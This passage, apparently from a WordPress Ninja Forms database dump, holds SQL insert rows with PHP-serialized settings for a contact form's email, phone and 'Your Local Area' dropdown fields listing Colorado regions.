ields'),(3461,111,'editActive','','editActive',''),(3462,111,'order','4','order','4'),(3463,111,'type','email','type','email'),(3464,111,'def_id','14','def_id','14'),(3465,111,'label','Email','label','Email'),(3466,111,'label_pos','above','label_pos','above'),(3467,111,'mask','','mask',''),(3468,111,'datepicker','0','datepicker','0'),(3469,111,'first_name','0','first_name','0'),(3470,111,'last_name','0','last_name','0'),(3471,111,'from_name','0','from_name','0'),(3472,111,'user_address_1','0','user_address_1','0'),(3473,111,'user_address_2','0','user_address_2','0'),(3474,111,'user_city','0','user_city','0'),(3475,111,'user_zip','0','user_zip','0'),(3476,111,'user_phone','0','user_phone','0'),(3477,111,'user_info_field_group','1','user_info_field_group','1'),(3478,111,'show_help','0','show_help','0'),(3479,111,'help_text','','help_text',''),(3480,111,'calc_auto_include','0','calc_auto_include','0'),(3481,111,'calc_option','0','calc_option','0'),(3482,111,'placeholder','','placeholder',''),(3483,111,'disable_input','0','disable_input','0'),(3484,111,'input_limit','','input_limit',''),(3485,111,'input_limit_type','char','input_limit_type','char'),(3486,111,'input_limit_msg','','input_limit_msg',''),(3487,111,'user_state','0','user_state','0'),(3488,111,'autocomplete_off','0','autocomplete_off','0'),(3489,111,'num_sort','0','num_sort','0'),(3490,111,'admin_label','','admin_label',''),(3491,111,'user_info_field_group_name','','user_info_field_group_name',''),(3492,111,'user_info_field_group_custom','','user_info_field_group_custom',''),(3493,111,'show_desc','0','show_desc','0'),(3494,111,'desc_pos','none','desc_pos','none'),(3495,111,'desc_text','','desc_text',''),(3496,111,'element_class','','element_class',''),(3497,111,'required','1','required','1'),(3498,111,'key','email_120','key','email_120'),(3499,111,'default','','default',''),(3500,111,'container_class','one-half first','container_class','one-half first'),(3501,111,'custom_name_attribute','email','custom_name_attribute','email'),(3502,111,'personally_identifiable','1','personally_identifiable','1'),(3503,111,'parent_id','11','parent_id','11'),(3504,112,'objectType','Field','objectType','Field'),(3505,112,'objectDomain','fields','objectDomain','fields'),(3506,112,'editActive','','editActive',''),(3507,112,'order','5','order','5'),(3508,112,'type','phone','type','phone'),(3509,112,'def_id','15','def_id','15'),(3510,112,'label','Phone','label','Phone'),(3511,112,'label_pos','above','label_pos','above'),(3512,112,'mask','(999) 999-9999','mask','(999) 999-9999'),(3513,112,'datepicker','0','datepicker','0'),(3514,112,'first_name','0','first_name','0'),(3515,112,'last_name','0','last_name','0'),(3516,112,'from_name','0','from_name','0'),(3517,112,'user_address_1','0','user_address_1','0'),(3518,112,'user_address_2','0','user_address_2','0'),(3519,112,'user_city','0','user_city','0'),(3520,112,'user_zip','0','user_zip','0'),(3521,112,'user_email','0','user_email','0'),(3522,112,'user_info_field_group','1','user_info_field_group','1'),(3523,112,'show_help','0','show_help','0'),(3524,112,'help_text','','help_text',''),(3525,112,'calc_auto_include','0','calc_auto_include','0'),(3526,112,'calc_option','0','calc_option','0'),(3527,112,'placeholder','','placeholder',''),(3528,112,'disable_input','0','disable_input','0'),(3529,112,'input_limit','','input_limit',''),(3530,112,'input_limit_type','char','input_limit_type','char'),(3531,112,'input_limit_msg','','input_limit_msg',''),(3532,112,'user_state','0','user_state','0'),(3533,112,'autocomplete_off','0','autocomplete_off','0'),(3534,112,'num_sort','0','num_sort','0'),(3535,112,'admin_label','','admin_label',''),(3536,112,'user_info_field_group_name','','user_info_field_group_name',''),(3537,112,'user_info_field_group_custom','','user_info_field_group_custom',''),(3538,112,'show_desc','0','show_desc','0'),(3539,112,'desc_pos','none','desc_pos','none'),(3540,112,'desc_text','','desc_text',''),(3541,112,'element_class','','element_class',''),(3542,112,'required','1','required','1'),(3543,112,'key','phone_121','key','phone_121'),(3544,112,'default','','default',''),(3545,112,'container_class','one-half','container_class','one-half'),(3546,112,'manual_key','','manual_key',''),(3547,112,'custom_mask','','custom_mask',''),(3548,112,'custom_name_attribute','phone','custom_name_attribute','phone'),(3549,112,'personally_identifiable','1','personally_identifiable','1'),(3550,112,'parent_id','11','parent_id','11'),(3551,113,'objectType','Field','objectType','Field'),(3552,113,'objectDomain','fields','objectDomain','fields'),(3553,113,'editActive','','editActive',''),(3554,113,'order','6','order','6'),(3555,113,'type','listselect','type','listselect'),(3556,113,'label','Your Local Area','label','Your Local Area'),(3557,113,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3558,113,'label_pos','above','label_pos','above'),(3559,113,'list_type','dropdown','list_type','dropdown'),(3560,113,'multi_size','5','multi_size','5'),(3561,113,'list_show_value','1','list_show_value','1'),(3562,113,'list','a:0:{}','list','a:0:{}'),(3563,113,'user_info_field_group','','user_info_field_group',''),(3564,113,'calc_auto_include','0','calc_auto_include','0'),(3565,113,'user_state','0','user_state','0'),(3566,113,'num_sort','0','num_sort','0'),(3567,113,'admin_label','','admin_label',''),(3568,113,'show_help','0','show_help','0'),(3569,113,'help_text','','help_text',''),(3570,113,'show_desc','0','show_desc','0'),(3571,113,'desc_pos','none','desc_pos','none'),(3572,113,'desc_text','','desc_text',''),(3573,113,'element_class','','element_class',''),(3574,113,'required','1','required','1'),(3575,113,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 